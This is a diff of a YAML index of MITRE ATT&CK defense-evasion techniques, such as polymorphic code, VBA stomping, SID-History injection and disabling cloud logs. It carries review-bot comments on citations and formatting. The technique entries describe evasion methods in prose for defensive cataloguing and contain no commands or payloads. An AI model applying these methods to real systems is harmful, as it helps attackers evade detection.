- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -10026,9 +10112,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -10051,7 +10134,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -10069,8 +10152,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
@@ -10109,7 +10190,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10152,10 +10233,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
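Review bot: the new T1027.014 Polymorphic Code object arrives with x_mitre_detection: '' and atomic_tests: [], so it adds a technique that nothing in this index exercises yet. That is expected for a fresh ATT&CK import, but confirm the per-platform index CSVs for the platforms it lists (Windows, macOS, Linux) were regenerated from the same data so the technique shows up there as well. Minor: the double-quoted description scalar ends with a literal \n before the closing quote, which leaves a trailing newline in the rendered description; harmless, but it is not how the other descriptions in this file are written.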
@@ -10199,7 +10348,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10224,8 +10373,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
@@ -10256,7 +10403,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -10275,7 +10422,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -10370,11 +10516,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10454,11 +10599,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10523,12 +10667,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10577,8 +10720,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -10593,14 +10736,13 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests: []
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10612,7 +10754,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -10642,13 +10784,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10709,7 +10850,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -10765,11 +10905,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10793,11 +10932,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -10822,9 +10960,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -10904,7 +11041,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -10938,7 +11074,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10965,8 +11101,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
@@ -11061,48 +11195,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests: []
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
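Review bot: the description now names `ilasm.exe(Citation: ATTACK IQ)` as a compiler adversaries use, but the unchanged `x_mitre_detection` text in the same hunk still only tells defenders to monitor "common compilers, such as csc.exe and GCC/MinGW". If the detection guidance is mirrored verbatim from upstream, fine, but it is now narrower than the behaviour the description covers, and the missing space before the citation marker (`ilasm.exe(Citation:`) is also carried through from upstream.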
@@ -11111,9 +11221,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -11125,12 +11240,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests: []
T1564.007:
@@ -11178,7 +11316,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11204,12 +11342,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11299,7 +11435,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -11357,12 +11492,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -11404,10 +11538,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -11431,18 +11564,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
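Review bot: the rewritten description drops the entire third paragraph of the old text (the Azure Global Administrator subscription creation and pay-as-you-go subscription hijacking scenario with its `Microsoft Peach Sandstorm 2023` and `Microsoft Subscription Hijacking 2022` citations), which is a substantive content change rather than a reformat, and the new scalar ends with a trailing space before the closing quote at `Cloud Regions](https://attack.mitre.org/techniques/T1535). "`. The major version bump to 2.0 in the following hunk matches the removal, but the dropped scenario should be called out in the commit message since it is the kind of detail cloud defenders search this file for.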
@@ -11456,7 +11601,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -11468,20 +11613,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
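Review bot: the `Microsoft Subscription Hijacking 2022` and `Microsoft Peach Sandstorm 2023` reference entries are deleted here to match the shortened description; verify that no `(Citation: ...)` marker for either name survives anywhere else in the T1578.005 object, for example in `x_mitre_detection`, since a citation marker with no matching `external_references` entry would be a dangling reference that renderers cannot resolve.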
@@ -11490,11 +11626,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11503,6 +11638,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
